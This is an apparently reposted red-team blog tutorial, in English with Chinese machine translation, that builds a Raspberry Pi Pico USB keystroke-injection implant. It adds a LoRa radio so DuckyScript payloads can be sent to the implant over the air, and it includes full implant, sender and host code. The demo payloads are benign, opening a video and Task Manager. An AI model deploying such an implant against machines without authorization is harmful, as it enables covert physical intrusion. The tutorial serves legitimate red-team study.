Offensive IoT for Red Team Implants (Part 2)

IoT 4周前 admin
10 0 0
Offensive IoT for Red Team Implants (Part 2)

This is Part Two of the blog series, Offensive IoT for Red Team Implants, so if you have not read PART ONE, I would encourage you do to so first and then come back here.
这是博客系列的第二部分,红队植入物的进攻性物联网,所以如果你还没有读过第一部分,我鼓励你先读一读,然后再回到这里。

In this blog, we are going take a “from the ground up” approach to getting a Raspberry Pi Pico (Pico W) set up and running as a physical implant device for attacks such as USB Rubbery Ducky. Then, we will pivot slightly and extend the capability for the implant device by enabling and using a bolted-on LoRa module to take the entire attack process to level 11. Let’s dive in.
在这篇博客中,我们将采用“从头开始”的方法,将 Raspberry Pi Pico (Pico W) 设置为物理植入设备并运行,以应对 USB Rubbery Ducky 等攻击。然后, 我们将稍微旋转并通过启用和使用螺栓固定的 LoRa 模块来扩展植入设备的功能,将整个攻击过程提升到 11 级.让我们开始吧。

You are going to need to have some basic hardware accessible to you, mainly: a Raspberry Pi Pico or Pico W (which I will just reference as a Pico from here on out) and a micro USB cable. (You also need a computer, but I am assuming that was a given.)
您将需要一些基本的硬件可供您访问,主要是:Raspberry Pi Pico或Pico W(从现在开始我将将其称为Pico)和微型USB电缆。(你还需要一台电脑,但我假设这是给定的。

Getting Started 开始

To get started, you will need to set up the environment for the configuring and programming of your Pico. For this blog series, we are going to be using CircuitPython1 as our language of choice. There are many options available for the Pico platform, including C/C++ and Arduino, but, for this use case, Circuit Python is a pretty solid choice, with its ease of use and preexisting libraries.
首先,您需要设置 Pico 的配置和编程环境。在本博客系列中,我们将使用 CircuitPython 1 作为我们选择的语言。Pico平台有许多可用的选项,包括C / C++和Arduino,但是,对于此用例,Circuit Python是一个非常可靠的选择,具有易用性和预先存在的库。

You are also going to need some sort of IDE to develop your code in. For this blog, we are going to use Thonny IDE, which touts itself as a Python IDE for beginners.2 You don’t have to use Thonny; there are many IDEs out there to choose from, but for the purpose of keeping it simple, that is what we will use.
您还需要某种 IDE 来开发代码。在本博客中,我们将使用 Thonny IDE,它自称是面向初学者的 Python IDE。 2 您不必使用 Thonny;有许多 IDE 可供选择,但为了保持简单,我们将使用这些 IDE。

THONNY IDE 托尼 IDE

First, you need to download Thonny from the website: https://thonny.org/
首先,您需要从网站下载 Thonny:https://thonny.org/

Offensive IoT for Red Team Implants (Part 2)

Thonny is cross-platform compatible, so whether you are running on Windows, a Mac, or Linux, you should not have any issues.
Thonny 是跨平台兼容的,因此无论您是在 Windows、Mac 还是 Linux 上运行,您都应该不会有任何问题。

After you have downloaded the installer for your OS of choice, you then need to install Thonny by executing the installer. I happened to be on a Windows system while authoring this blog, so below is a screenshot of what the install looks like on Windows.
下载所选操作系统的安装程序后,您需要通过执行安装程序来安装 Thonny。在创作此博客时,我碰巧在 Windows 系统上,所以下面是 Windows 上安装的屏幕截图。

Offensive IoT for Red Team Implants (Part 2)

Once you have Thonny installed, you are ready for the next steps — installing Circuit Python on your Pico.
安装 Thonny 后,您就可以进行下一步了——在 Pico 上安装 Circuit Python。

CIRCUIT PYTHON 电路蟒蛇

To get your Pico running with CircuitPython, you need to first download the version of CircuitPython that corresponds to the Pico you have. In my case, I am using a Pico W, but you could also be using just a Pico, or, possibly, one of the 495 boards CircuitPython supports. While this blog is based on the Pico and Pico W, it’s important to note that this process should work with any RP2040-based board (but your milage may vary).
要让你的Pico与CircuitPython一起运行,你需要首先下载与你拥有的Pico相对应的CircuitPython版本。就我而言,我使用的是 Pico W,但您也可以只使用 Pico,或者可能是 CircuitPython 支持的 495 块板之一。虽然本博客基于 Pico 和 Pico W,但需要注意的是,此过程应该适用于任何基于 RP2040 的电路板(但您的里程可能会有所不同)。

Offensive IoT for Red Team Implants (Part 2)

After selecting your board on the CircuitPython Download page, you will be taken to a page where you can download the CircuitPython firmware file, a .UF2 file, for your chosen board.
在 CircuitPython 下载页面上选择您的电路板后,您将被带到一个页面,您可以在其中下载 CircuitPython 固件文件,一个 .UF2 文件,用于您选择的电路板。

Offensive IoT for Red Team Implants (Part 2)

Download the latest stable release firmware file to your computer; at the time of this writing, it was 9.0.4.
将最新的稳定版本固件文件下载到您的计算机;在撰写本文时,它是 9.0.4。

Once you have downloaded the .UF2 file, you can then connect your Pico to your computer using a micro USB cable. I would suggest you first plug the micro USB end of the cable into the Pico, WITHOUT the other end of the USB cable being plugged into your computer. The reason for this is that you will need to hold down the BOOTSEL button on the Pico when powering up to install CircuitPython, and that is a lot easier to do if you use one hand to hold the button down and the other to connect the USB cable to your computer.
下载 .UF2 文件,然后您可以使用微型 USB 电缆将 Pico 连接到计算机。我建议您先将电缆的微型 USB 端插入 Pico,而不要将 USB 电缆的另一端插入计算机。这样做的原因是,在通电安装 CircuitPython 时,您需要按住 Pico 上的 BOOTSEL 按钮,如果您用一只手按住按钮,另一只手将 USB 电缆连接到您的计算机,这要容易得多。

Offensive IoT for Red Team Implants (Part 2)

After powering up the Pico with the BOOTSEL button being held down, the Pico should present as a drive on your computer and should be named RPI-RP2 or something similar.
按住 BOOTSEL 按钮打开 Pico 电源后,Pico 应作为驱动器显示在您的计算机上,并应命名为 RPI-RP2 或类似名称。

Offensive IoT for Red Team Implants (Part 2)

Now, you will want to find where you downloaded the firmware file. You are going to need to copy it to the new drive on your computer.
现在,您需要找到下载固件文件的位置。您需要将其复制到计算机上的新驱动器。

Offensive IoT for Red Team Implants (Part 2)

After successfully copying the firmware file to the drive, it should automatically disconnect from your host and then reconnect after a few moments, which, at that point, you should have a new drive appear called CIRCUITPY. If you have this new drive mounted on your computer, you have successfully installed CircuitPython on your Pico and are ready for the next steps.
成功将固件文件复制到驱动器后,它应该会自动断开与主机的连接,然后在片刻后重新连接,此时,您应该会出现一个名为 CIRCUITPY 的新驱动器。如果您的计算机上安装了这个新驱动器,则表示您已在 Pico 上成功安装了 CircuitPython,并已准备好进行后续步骤。

Offensive IoT for Red Team Implants (Part 2)

Now, you need to open the Thonny IDE. In doing so, it should automatically connect to the COM port where your Pico is attached; in my case, it was COM9, but yours may be different.
现在,您需要打开 Thonny IDE。这样做时,它应该自动连接到连接 Pico 的 COM 端口;就我而言,它是 COM9,但你的可能不同。

Offensive IoT for Red Team Implants (Part 2)

If it does not automatically connect to your Pico’s COM port, you can manually select which COM port you would like to connect to using the menu in the lower right corner of the Thonny IDE.
如果它没有自动连接到 Pico 的 COM 端口,您可以使用 Thonny IDE 右下角的菜单手动选择要连接到的 COM 端口。

In Thonny, you need to install some packages so do this, click on Tools, and then Manage packages.
在Thonny中,您需要安装一些软件包,因此请执行此操作,单击“工具”,然后单击“管理软件包”。

Offensive IoT for Red Team Implants (Part 2)

When the Manage Packages screen opens, you need to search for the following: adafruit-circuitpython-hid and then click the search button on the right.
当“管理包”屏幕打开时,您需要搜索以下内容:adafruit-circuitpython-hid,然后单击右侧的搜索按钮。

You should get a single result — click on it, and then click ‘Install’ at the bottom of the screen.
您应该得到一个结果 – 单击它,然后单击屏幕底部的“安装”。

Offensive IoT for Red Team Implants (Part 2)
Offensive IoT for Red Team Implants (Part 2)

Now, you should have everything configured and ready to start writing some code to make your Pico something slightly more sinister.
现在,您应该已经配置好了所有内容,并准备好开始编写一些代码,以使您的Pico更加险恶。

Write Some Code 编写一些代码

The next step is for you to open the file code.py that is on your Pico. To do this, you can click on the folder icon in the menu bar and then select the bottom option, CircuitPython device.
下一步是打开Pico上的文件 code.py。为此,您可以单击菜单栏中的文件夹图标,然后选择底部选项 CircuitPython 设备。

Offensive IoT for Red Team Implants (Part 2)

Then a file prompt will open, and you can select code.py.
然后将打开文件提示,您可以选择 code.py。

Offensive IoT for Red Team Implants (Part 2)

You may find that your code.py already has something in it, like print(“Hello World”), but no worries, you can delete that and then copy the following code into the file.
你可能会发现你的 code.py 已经有一些东西了,比如 print(“Hello World”),但不用担心,你可以删除它,然后将以下代码复制到文件中。

import time
import board
import usb_hid

from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
from adafruit_hid.keycode import Keycode

# Setup for keyboard emulation
keyboard = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(keyboard)

# Function to perform a combination of key presses
def press_keys(*keys, delay=0.1):
    keyboard.press(*keys)
    time.sleep(delay)
    keyboard.release_all()

time.sleep(2) # Delay to make sure the device is connected before trying to injection keystrokes
# Open a web browser
press_keys(Keycode.GUI, Keycode.R)  # Windows key + R to open run dialog
layout.write('https://www.youtube.com/watch?v=dQw4w9WgXcQ&themeRefresh=1\n')
Offensive IoT for Red Team Implants (Part 2)

Click on the Save icon to save the file and then hit F5 or the green run button to test your code. If everything worked as expected, you should have had a web browser open and everyone’s favorite YouTube video started playing.
单击“保存”图标保存文件,然后按 F5 或绿色运行按钮来测试代码。如果一切按预期工作,您应该已经打开了一个网络浏览器,并且每个人都喜欢的 YouTube 视频开始播放。

If that did not work for you, there are a couple of reasons why that may be the case. First, the code you ran was written to be executed on a Windows-based PC. If you are doing your development on something other than Windows, you would need to connect your Pico with your code running to a Windows PC to see if it worked. Secondly, there could have been an error in your copy-and-paste process, so double check the code and use the error messages in the Thonny console to help you diagnose the issue.
如果这对您不起作用,那么可能有几个原因。首先,您运行的代码是编写为在基于 Windows 的 PC 上执行的。如果您在 Windows 以外的其他设备上进行开发,则需要将 Pico 与运行到 Windows PC 的代码连接起来,以查看它是否有效。其次,您的复制和粘贴过程中可能存在错误,因此请仔细检查代码并使用 Thonny 控制台中的错误消息来帮助您诊断问题。

Assuming it all did work for you, the code you just ran is not exceptionally evil, as you can see. What you have done is performed a keystroke injection attack using Python. Hard? Not really. Impressive? Again, not really. However, this lays the groundwork for a very powerful keystroke injection platform, but this is currently about the absolute most basic thing you can do with this approach. We need to do more!
假设这一切都对你有用,你刚刚运行的代码并不是特别邪恶,正如你所看到的。您所做的是使用 Python 执行击键注入攻击。硬?没有。令人 印象 深刻?同样,不是真的。然而,这为一个非常强大的击键注入平台奠定了基础,但这是目前你可以用这种方法做的绝对最基本的事情。我们需要做得更多!

Let’s start by installing a new library called Adafruit-circuitpython-ducky within Thonny IDE. To do this, click on Tools > Manage packages, and then search for the package by name and install.
让我们首先在 Thonny IDE 中安装一个名为 Adafruit-circuitpython-ducky 的新库。为此,请单击“工具”>“管理包”,然后按名称搜索包并安装。

Offensive IoT for Red Team Implants (Part 2)

This package allows us to use pre-written Ducky Script payloads and have them execute via our Python code. This is super effective, as it allows one to use the plethora of existing payloads without the need to write each one from scratch.
这个包允许我们使用预先编写的 Ducky Script 有效负载,并通过我们的 Python 代码执行它们。这是非常有效的,因为它允许人们使用大量的现有有效载荷,而无需从头开始编写每个有效载荷。

Once you have the ducky package installed, you can modify your code.py file with the following contents to leverage the library.
安装 ducky 软件包后,您可以使用以下内容修改 code.py 文件以利用该库。

import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import adafruit_ducky

time.sleep(2)  # Sleep for a bit to avoid a race condition on some systems
keyboard = Keyboard(usb_hid.devices)
keyboard_layout = KeyboardLayoutUS(keyboard)  # We're in the US :)

duck = adafruit_ducky.Ducky('duckyscript.txt', keyboard, keyboard_layout)
result = True
while result is not False:
    result = duck.loop()

What the previous code does is open a file called duckscript.txtand iterates over it, injecting each line within the script as keystrokes on the target computer. But to dothis, we need a payload file, so let’s generate that now.
前面的代码所做的是打开一个名为 duckscript.txt的文件,然后循环访问它,将脚本中的每一行作为击键注入到目标计算机上。但要做到这一点,我们需要一个有效负载文件,所以现在让我们生成它。

Create a new file within Thonny called duckyscript.txt, add the following text, and save it to the device as duckyscript.txt.
在 Thonny 中创建一个名为 duckyscript.txt 的新文件,添加以下文本,并将其作为 duckyscript.txt 保存到设备中。

WINDOWS r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER

The DuckyScript3 code you just saved to a file does the exact same thing as the previous Python code but is much simpler to read and write.
您刚刚保存到文件中的 DuckyScript 3 代码与之前的 Python 代码完全相同,但读写起来要简单得多。

Now, run your code.py by clicking on the Run icon or hitting F5.
现在,通过单击“运行”图标或按 F5 来运行您的 code.py。

You should get the same result as previously but with code that is a lot more reusable.
您应该获得与以前相同的结果,但代码的可重用性要高得多。

At this point, you can replace duckscript.txt with any DuckyScript payload and your Pico should be able to run it just fine. You have now created a simple USB rubber ducky-style implant device using Pico and some Python code, but I think if you have made it this far, you are expecting a little more than a simple replication of existing abilities.
此时,您可以用任何 DuckyScript 有效负载替换duckscript.txt,您的 Pico 应该能够正常运行它。你现在已经用Pico和一些Python代码创建了一个简单的USB橡皮鸭式植入设备,但我认为如果你已经做到了这一点,你所期望的不仅仅是对现有能力的简单复制。

Teaching a Rubber Duck to Fly…
教橡皮鸭飞翔……

So, while the code works and does allow us to use a Pico as a USB rubber ducky, that is still a pretty limited use case because, as it is, we really only have the ability to run the single duck script. Yes, we could create another loop that would then execute additional duck scripts, but that forces you to really plan and load everything you need ahead of time. What if you can opt to run additional scripts later and even add new scripts? That would be something, wouldn’t it? Well, there are devices out there than can do this already using with Wi-Fi or Bluetooth, but the issue with that approach is that, one, those mechanisms have a limited range, and, two, they can easily be detected. Thirdly, that’s just not as fun as what we are about to do.
因此,虽然代码有效并且确实允许我们将 Pico 用作 USB 橡皮鸭,但这仍然是一个非常有限的用例,因为实际上我们只能运行单个鸭子脚本。是的,我们可以创建另一个循环,然后执行额外的鸭子脚本,但这会迫使你提前计划和加载你需要的一切。如果您可以选择稍后运行其他脚本,甚至添加新脚本,该怎么办?那会是什么,不是吗?好吧,有些设备已经可以与Wi-Fi或蓝牙一起使用,但这种方法的问题在于,第一,这些机制的范围有限,第二,它们很容易被检测到。第三,这并不像我们将要做的事情那么有趣。

IOT ENTERS THE ROOM…
物联网进入房间…

Okay, so let’s level set for just a moment – we are not really using IoT devices for physical implants but rather, we are going to leverage one of the common IoT communication methods; in this case, LoRa. I talked about some of the reasons why this is a good and interesting option in the previous blog post, so if you want to understand the why of LoRa, go back and read it.
好的,让我们暂时设定一下水平——我们并没有真正将物联网设备用于物理植入物,而是我们将利用一种常见的物联网通信方法;在本例中,LoRa.我在之前的博客文章中谈到了为什么这是一个好而有趣的选择的一些原因, 所以如果你想了解 LoRa 的原因, 回去阅读它.

Offensive IoT for Red Team Implants (Part 2)
Completed Pico-LoRa PCB in Acrylic Case
完成的 Pico-LoRa PCB 在亚克力外壳中

To do this, I am using a custom PCB that has a Pico W and RFM95 LoRa module on it, but you don’t need custom hardware as you can buy an off the shelf solution like the Adafruit Feather RP2040 with RFM95 https://www.adafruit.com/product/5714 which is effectively the same hardware I am using, in a prebuilt package.
为此,我使用的是带有 Pico W 和 RFM95 LoRa 模块的定制 PCB,但您不需要定制硬件,因为您可以购买现成的解决方案,例如带有 RFM2040 的 Adafruit Feather RP95 https://www.adafruit.com/product/5714 这实际上与我正在使用的硬件相同,在预构建的封装中。

Also, it is vital to note that you will need TWO devices to be able to perform this Over-The-Air (OTA) Rubber Ducky attack — one device as your implant and one device that will act as your sender.
此外,重要的是要注意,您将需要两台设备才能执行这种无线 (OTA) 橡皮鸭攻击——一台设备作为您的植入物,一台设备充当您的发送者。

For my purposes, I am just using two of the custom PCBs, but you could use two of the Adafruit Feathers or any other supported devices, if the LoRa modules are the same and the same configuration for said modules is used.
出于我的目的, 我只使用两个定制 PCB, 但是您可以使用两个 Adafruit Feathers 或任何其他受支持的设备, 如果 LoRa 模块相同并且使用相同的模块配置.

IMPLANT CODE 植入代码

We are going to start with the code for the implant device first. We need to add one more library to our device so that we can use the attach LoRa module. In this case, we are going to use the Adafruit-circuitptytthon-rfm9x library that can be installed in the same manner as the other libraries.
我们将首先从植入设备的代码开始。我们需要为我们的设备再添加一个库,以便我们可以使用附加 LoRa 模块.在本例中,我们将使用 Adafruit-circuitptytthon-rfm9x 库,该库可以像其他库一样安装。

Once you have installed the library, you can open up the code.py file on your implant device in Thonny and copy the following code. There is no need to understand 100% of what is happening in the code but, at a high level, the code sets the type of HID to present as, as well as the keyboard layout we want to use. Then, it does some LoRa module configuration followed by defining the function to receive a script from over the air, a function to execute said script as well as defining main().
安装库后,您可以在 Thonny 中打开植入设备上的 code.py 文件并复制以下代码。无需 100% 了解代码中发生的情况,但在较高级别上,代码设置要呈现的 HID 类型以及我们想要使用的键盘布局。然后, 它执行一些 LoRa 模块配置,然后定义从空中接收脚本的函数, 执行所述脚本的函数以及定义 main().

import time
import board
import busio
import digitalio
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import adafruit_rfm9x
import adafruit_ducky

# Initialize keyboard
keyboard = Keyboard(usb_hid.devices)
keyboard_layout = KeyboardLayoutUS(keyboard)

# Initialize SPI connection
spi = busio.SPI(board.GP2, MOSI=board.GP3, MISO=board.GP4) # Your SPI Pins may be different

# Configure RFM95 CS and RESET pins
cs = digitalio.DigitalInOut(board.GP5)
reset = digitalio.DigitalInOut(board.GP6)

# Initialize RFM9x
rfm9x = adafruit_rfm9x.RFM9x(spi, cs, reset, 915.0)  # Adjust frequency to match your region
rfm9x.tx_power = 13 # Default transmission Power
rfm9x.signal_bandwidth = 250000 # 250000  # Set signal bandwidth
rfm9x.coding_rate = 5  # Set coding rate (4/5, 4/6, 4/7, 4/8)
rfm9x.spreading_factor = 7  # Set spreading factor (6 to 12)
rfm9x.node = 255

# Function to receive scripts and write them to a file
def receive_scripts():
    print("Waiting for new scripts via LoRa...")
    with open('lora_script.txt', 'w') as file:  # Open file in write mode
        while True:
            packet = rfm9x.receive(timeout=None)  # Block indefinitely until a packet is received
            if packet is not None:
                script_line = str(packet, 'utf-8').strip()  # Decode packet text
                print("Received line:", script_line)
                if script_line == 'DNE':  # Check for termination string
                    print("End of script received.")
                    break  # Exit the loop to process the script
                file.write(script_line + '\n')  # Write each line to the file
            else:
                pass #print("No packet received, continuing to listen...")

# Function to execute the script
def execute_script(filename):
    duck = adafruit_ducky.Ducky(filename, keyboard, keyboard_layout)
    result = True
    while result is not False:
        result = duck.loop()

# Main function to handle script reception and execution
def main():
    time.sleep(2)
    execute_script('duckyscript.txt')
    while True:
        receive_scripts()
        execute_script('lora_script.txt')

main()

When this code is run on the Pico, it will first execute the script duckyscript.txt as the default script after a short delay of 2 seconds to make sure the host is ready. This initial script could be anything you want it to be but, in our case, I have left it unmodified. Then, after running the default script, the Pico enters a loop where it will listen for any new scripts coming in over LoRa. Once the entire script has been received, it is saved to the Pico’s filesystem and then executed and the loop repeats, waiting for the next script to come in.
当此代码在 Pico 上运行时,它将在 2 秒的短暂延迟后首先执行脚本duckyscript.txt作为默认脚本,以确保主机已准备就绪。这个初始脚本可以是你想要的任何内容,但在我们的例子中,我没有修改它。然后,在运行默认脚本后,Pico 进入一个循环,它将侦听通过 LoRa 进入的任何新脚本。一旦收到整个脚本,它就会被保存到 Pico 的文件系统中,然后执行并重复循环,等待下一个脚本进入。

Offensive IoT for Red Team Implants (Part 2)

If you were able to send a new script over LoRa to the implant, it would fail because, as it stands, the file system is not writable. To change this, you need to create a new file with the following contents and then save it as boot.py.
如果您能够通过 LoRa 将新脚本发送到植入程序,它将失败,因为就目前而言,文件系统是不可写的。要更改此设置,您需要创建一个包含以下内容的新文件,然后将其另存为 boot.py。

import storage

storage.remount('/', readonly=False)

This code will allow CircuitPython to be able to write to the filesystems and save any script received over LoRa.
此代码将允许 CircuitPython 能够写入文件系统并保存通过 LoRa 接收的任何脚本.

You now have your implant ready to go. Disconnect it from your host for now. Thonny can get temperamental trying to configure multiple devices at the same time, so its better to just have one device at a time connected.
您现在已经准备好植入物了。暂时断开它与主机的连接。Thonny 在尝试同时配置多个设备时可能会变得脾气暴躁,因此最好一次只连接一台设备。

SENDER CODE 发件人代码

Now, for the sending side of the equation. First, you will want to connect your second device to your computer and select the appropriate COM port in Thonny. Next, you will need to install the necessary libraries, which should only be adafruit-circuitptytthon-rfm9x. All other dependencies will be installed with the RFM9x library.
现在,对于等式的发送方。首先,您需要将第二台设备连接到计算机,然后在Thonny中选择适当的COM端口。接下来,您需要安装必要的库,这些库应该只是 adafruit-circuitptytthon-rfm9x。所有其他依赖项都将随 RFM9x 库一起安装。

After installing the RFM9x library, you can open code.py and copy the following code into it.
安装RFM9x库后,您可以打开 code.py 并将以下代码复制到其中。

import time
import board
import busio
import digitalio
import adafruit_rfm9x

# Serial setup
import usb_cdc
serial = usb_cdc.data 

# Initialize SPI connection
spi = busio.SPI(board.GP2, MOSI=board.GP3, MISO=board.GP4)

# Configure RFM95 CS and RESET pins
cs = digitalio.DigitalInOut(board.GP5)
reset = digitalio.DigitalInOut(board.GP6)

# Initialize RFM9x
rfm9x = adafruit_rfm9x.RFM9x(spi, cs, reset, 915.0)  # Adjust frequency to match your region
rfm9x.tx_power = 13  # Default transmission
rfm9x.signal_bandwidth = 250000 # 250000  # Set signal bandwidth
rfm9x.coding_rate = 5  # Set coding rate (4/5, 4/6, 4/7, 4/8)
rfm9x.spreading_factor = 7  # Set spreading factor (6 to 12)
rfm9x.node = 255

# Function to receive from serial and send over LoRa
def receive_and_transmit():
    while True:
        print("Waiting for data...")
        line = serial.readline().decode().strip()  # This should block until a line is received
        if line:
            print("Received from serial:", line)
            rfm9x.send(bytes(line, 'utf-8'))
            print("Sent over LoRa:", line)

receive_and_transmit()

This code is pretty simple, as it sets up the LoRa module configuration and then listens to the serial port for data that then gets transmitted over LoRa.
这段代码非常简单,因为它设置了 LoRa 模块配置,然后侦听串行端口以获取数据,然后通过 LoRa 传输.

Next, you will need to create boot.py file on this device with the following content:
接下来,您需要在此设备上创建包含以下内容 boot.py 文件:

import usb_cdc
  
usb_cdc.enable(console=True, data=True) 

In order for the boot.py code to work, you will need to fully disconnect your second device and reconnect it. What this code is doing is creating a second serial port on the device that allows us to monitor what is happening in Thonny, as well as sending data to the secondary serial port for it to be transmitted. I call this a development quality of life configuration.
为了使 boot.py 代码正常工作,您需要完全断开第二台设备的连接并重新连接。这段代码所做的是在设备上创建第二个串行端口,使我们能够监控 Thonny 中发生的事情,并将数据发送到辅助串行端口以进行传输。我称之为开发生活质量配置。

SEND TO SENDER CODE
发送到发件人代码

With the device code completed, the last thing we need to do is create some client code that can send a ducky script file over serial to the sender device for transmission.
完成设备代码后,我们需要做的最后一件事是创建一些客户端代码,这些代码可以通过串行将鸭子脚本文件发送到发送方设备进行传输。

On your host, create a file called sender.py and save the following contents to it:
在主机上,创建名为 sender.py 的文件,并将以下内容保存到其中:

import serial
import time

# Configure your serial connection
serial_port = 'COM14'  # This will vary based on your operating system and setup
baud_rate = 115200  # Make sure this matches the baud rate on your Pico

def send_script(filename):
    try:
        with serial.Serial(serial_port, baud_rate, timeout=1) as ser:

            with open(filename, 'r') as file:
                for line in file:
                    print("Sending: ", line.strip())
                    ser.write(line.encode() + b"\n")
                    time.sleep(0.5)  # Give the Pico time to process and send the line
            ser.write(b'DNE\n') # Termination Line for EOF
    except serial.SerialException as e:
        print("Error opening or using the serial port:", e)

send_script('duckyscript.txt')

You will need to update the serial_port value on line 5 to match that of the serial port on your host. Remember, now the device will present two serial ports to your host — in my case, COM13 and COM14. COM14 is the secondary serial port in my setup but you may have to try a couple of different values depending on your setup.
您需要更新第 5 行的 serial_port 值,以匹配主机上串行端口的值。请记住,现在设备将为您的主机提供两个串行端口 – 在我的例子中,COM13 和 COM14。COM14 是我设置中的辅助串行端口,但您可能需要根据您的设置尝试几个不同的值。

This code simply reads in the contents of the file duckscirpt.txt and then sends it, line by line, over to the sender device for transmission. When the end of the file is reached, a single line of DNE\n is written to the serial interface indicating the EOF. Save the code.
此代码只是读取文件duckscirpt.txt的内容,然后逐行将其发送到发送方设备进行传输。当到达文件末尾时,将单行 DNE\n 写入指示 EOF 的串行接口。保存代码。

Lastly, you need to save a payload on your host called duckyscript.txt with whatever Ducky Script payload you want.
最后,您需要在名为 duckyscript.txt 的主机上保存一个有效负载,其中包含您想要的任何 Ducky Script 有效负载。

Here I am using this simple payload that launches the Task Manager as a proof-of-concept.
在这里,我使用这个简单的有效负载来启动任务管理器作为概念验证。

CONTROL SHIFT ESC

Save the code, and you should be ready to go and fly our first rubber ducky over the air!
保存代码,您应该准备好在空中飞行我们的第一只橡皮鸭了!

Execution Time 执行时间

To launch the attack, you will first need to deploy your implant device by connecting it to the target PC. Then, from your attacking host, connect the sender device to your host, configure your sender.py script with the correct COM port, and fire away with the command python3 sender.py.
要发起攻击,您首先需要通过将植入设备连接到目标 PC 来部署植入设备。然后,从攻击主机将发送方设备连接到主机,使用正确的 COM 端口配置 sender.py 脚本,然后使用命令 python3 sender.py 发射。

Offensive IoT for Red Team Implants (Part 2)

Using a software-defined radio dongle, like the RTL-SDR, and a utility, like SDR#, you can see the LoRa packets being transmitted over the airwaves.
使用软件定义的无线电加密狗(如 RTL-SDR)和实用程序(如 SDR#),您可以看到通过无线电波传输的 LoRa 数据包。

Offensive IoT for Red Team Implants (Part 2)

On the target device, Task Manager should be running on the screen. Just as we planned it!
在目标设备上,任务管理器应在屏幕上运行。正如我们计划的那样!

Offensive IoT for Red Team Implants (Part 2)

If all worked well, your victim should have not only gotten Rick-Rolled, but also fallen victim to a flyby rubber ducky attack.
如果一切顺利,你的受害者不仅应该被 Rick-Rolled,而且还应该成为飞越橡皮鸭攻击的受害者。

Footnotes 脚注

  1. https://circuitpython.org/ ↩︎
    ↩https://circuitpython.org/ ︎
  2. https://thonny.org/ ↩︎ ↩https://thonny.org/ ︎
  3. https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference ↩︎
    ↩https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference ︎

原文始发于Tim Fowler Offensive IoT for Red Team Implants (Part 2)

版权声明:admin 发表于 2024年5月18日 上午9:50。
转载请注明:Offensive IoT for Red Team Implants (Part 2) | CTF导航

相关文章